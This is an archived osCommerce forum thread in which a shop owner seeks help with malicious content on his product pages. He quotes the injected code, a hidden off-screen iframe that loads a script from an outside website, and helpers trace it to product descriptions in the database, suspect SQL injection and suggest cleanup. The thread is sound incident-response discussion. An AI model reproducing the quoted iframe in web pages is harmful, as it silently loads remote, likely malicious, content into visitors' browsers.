Jump to content

Archived

This topic is now archived and is closed to further replies.

Raymee

<iframe -- Need advice

Recommended Posts

Hi

 

I have a few problems with virus / bad links loading with my website oscommerce shop. www.equorum.co.uk/Studshop (this lists to a category list. Basically according to the firefox browser it is downloading stuff from another site.

 

It seems to happen when people click an image in a listing to navigate to product information. Having a look through the source code of the displayed page I found "<iframe src='http://dubaicompanieshouse.com/wp-includes/script.php' id='aqldn' name='eisjf' width='257' height='282' style='position:absolute; left:-3608;'></iframe>". which obviously was alien to me and the site.

 

I have searched the product info file and many others to see if I could find where the <iframe> code gets in (basically I am looking for the term <iframe> in the php code) but so far without luck and indeed - if I can trust it - my web design software cannot find the term either in the website.

 

Any advice on how to clean the website or what to look for would be appreciated. Even if it is just look harder

 

Raymond

Share this post


Link to post
Share on other sites

Hackers obfuscate their code most of the time.

 

I would bet it looks like the code described here

 

It might not be at the top of the file though.


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

Hackers obfuscate their code most of the time.

 

I would bet it looks like the code described here

 

It might not be at the top of the file though.

 

Thanks - I did a search for the term "eval" got many hits including where it was part of a word or part of a formula. However none that looked like the link and none that was replicated on all php pages.

 

The other thing I find strange is that none of the file date stamps (except for images) seem to be recent. Most being 2008 when I set up the site. If I take the site down - reload a fresh copy of Oscommerce and reload the database will this solve the problem or will it still be there.

 

Regards

Share this post


Link to post
Share on other sites

No it's not on all the pages.

 

Just on the product_info.php

 

If you post the code from the file I can probably spot the problem.

 

Taking the site down and reloading it will most likely get rid of the immediate problem.

 

What that probably won't fix is whatever security flaw allowed the code to be implanted in the first place.


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

After looking at the source code more closely, it looks to me like the rogue code is actually coming from the product descriptions stored in your DB.


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

No it's not on all the pages.

 

Just on the product_info.php

 

If you post the code from the file I can probably spot the problem.

 

Taking the site down and reloading it will most likely get rid of the immediate problem.

 

What that probably won't fix is whatever security flaw allowed the code to be implanted in the first place.

 

Thanks I will search that code again and load up also later - its past 2am and my eyes need a rest. Re how it got there - probably 777 but I have now reduced this to 755 changed the admin folder name and changed the password on the directory listing.

 

Thanks again and I will post later in the morning.

Share this post


Link to post
Share on other sites

I hope you didn't miss my last post.

 

Log into your admin and edit one of the products.

 

See what's in the product description.

 

I guessing that's where you'll find what you're looking for.

 

I've only seen the DB data compromised once before. Most of the time it's the PHP code that gets hacked.


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

I hope you didn't miss my last post.

 

Log into your admin and edit one of the products.

 

See what's in the product description.

 

I guessing that's where you'll find what you're looking for.

 

I've only seen the DB data compromised once before. Most of the time it's the PHP code that gets hacked.

 

I think your are right - I loaded an older copy of the product info file (held on the server under a different name) and while the display changed as I expected it didn't solve the problem.

 

I will have a look and see what is there.

Share this post


Link to post
Share on other sites

I think your are right - I loaded an older copy of the product info file (held on the server under a different name) and while the display changed as I expected it didn't solve the problem.

 

I will have a look and see what is there.

 

Yes you were right it is in the database description.

 

I can probably go to a backup from before the problems started to happen.

 

But need to understand why it happened and what I can do. Since this happended I have changed the admin directory and password. Could be PC that is used to populate the shop be contributing?

 

Basically tahnk you for your help so far - further advice appreciated.

 

Regards

Share this post


Link to post
Share on other sites

Sounds like a SQL injection attack to me.

 

All I can offer is the link below:

 

How to Secure Your Site


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

×